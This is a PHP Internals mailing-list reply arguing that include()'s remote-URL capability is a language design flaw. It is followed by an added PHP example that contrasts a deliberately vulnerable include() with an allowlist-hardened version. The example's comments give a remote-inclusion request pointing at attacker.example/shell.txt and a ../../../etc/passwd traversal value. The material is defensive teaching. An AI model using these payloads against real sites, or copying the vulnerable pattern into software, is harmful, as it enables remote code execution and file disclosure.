Stefan Esser writes:
 > I agree with Rasmus. Remote URL Includes are dying out.

That's not what Rasmus said.

 > Most released advisories are SQL Injections nowadays and well maybe
 > Russells next mail says: mysql_query() considered harmful.

When the top Google result for 'php security flaw' returns
mysql_query() instead of include(), I will agree that you are correct.

 > Ohhh btw Russell, if you really consider include harmful, then simply 
 > install the Hardening-Patch for PHP and live with it.

I'm not trying to fix this for me.  Clearly there are at least a
half-dozen things I could do to fix the problem for myself[!].  I
believe that the problem's cause is the design of the language
intrinsic.  Therefore, fixing the problem for myself doesn't address
the cause of the problem.  It just prevents me from seeing the problem
anymore.  The problem is still there.

[!] The first six:
 1) rm -rf php
 2) don't allow my users access to php.
 3) audit all code written by my users.
 4) turn allow_url_fopen off.
 5) install Hardening.
 6) write my own patch removing url_fopen capability from 'include'.

-- 
--My blog is at     blog.russnelson.com         | If you want to find
Crynwr sells support for free software  | PGPok | injustice in economic
521 Pleasant Valley Rd. | +1 315-323-1241       | affairs, look for the
Potsdam, NY 13676-3213  |                       | hand of a legislator.

-- 
PHP Internals - PHP Runtime Development Mailing List
To unsubscribe, visit: http://www.php.net/unsub.php
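The pattern the thread is arguing about, shown beside a hardened form, as an added example that is not code from the thread or from PHP itself. It assumes PHP 7 or later, a hypothetical layout of `pages/home.php` and `pages/about.php` next to the script, and a `?page=` query parameter; the `allow_url_include` setting it mentions in comments did not exist at the time of the thread (it was added in PHP 5.2.0 and is the setting that now governs include()/require() separately from allow_url_fopen).

```php
<?php
// Added example (not from the original thread): attacker-controlled
// include() beside an allowlist-based replacement. Assumes a hypothetical
// layout of pages/home.php and pages/about.php next to this script.

// VULNERABLE: with allow_url_fopen=On (and, on PHP >= 5.2, allow_url_include=On)
// a request like ?page=http://attacker.example/shell.txt fetches and executes
// remote code. Even with the URL wrappers off, a value such as
// ../../../etc/passwd still reaches include() as a local file inclusion.
function render_page_vulnerable(string $page): void
{
    include $page;   // raw request value goes straight to include()
}

// HARDENED: map the request value onto a fixed allowlist and only ever pass
// a path this code built to include(). Unknown values fall back to 'home'.
const PAGE_ALLOWLIST = [
    'home'  => 'pages/home.php',
    'about' => 'pages/about.php',
];

function resolve_page(string $page): string
{
    $base = __DIR__;
    $file = PAGE_ALLOWLIST[$page] ?? PAGE_ALLOWLIST['home'];
    $path = realpath($base . '/' . $file);

    // Defence in depth: realpath() resolves symlinks and '..' (and returns
    // false for a missing file), so the result must still sit under pages/.
    $pagesDir = $base . DIRECTORY_SEPARATOR . 'pages' . DIRECTORY_SEPARATOR;
    if ($path === false || strpos($path, $pagesDir) !== 0) {
        throw new RuntimeException('page not available');
    }
    return $path;
}

function render_page_hardened(string $page): void
{
    include resolve_page($page);
}

// php.ini settings corresponding to item 4 of the mail, as a second layer
// rather than the fix itself:
//   allow_url_fopen   = Off   ; disables http:// and ftp:// wrappers globally
//   allow_url_include = Off   ; PHP >= 5.2: include()/require() specifically
render_page_hardened($_GET['page'] ?? 'home');
```

The allowlist is what actually closes the hole: turning allow_url_fopen off stops remote inclusion but leaves local file inclusion through path traversal, which is why the resolved path is also checked against the pages directory.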
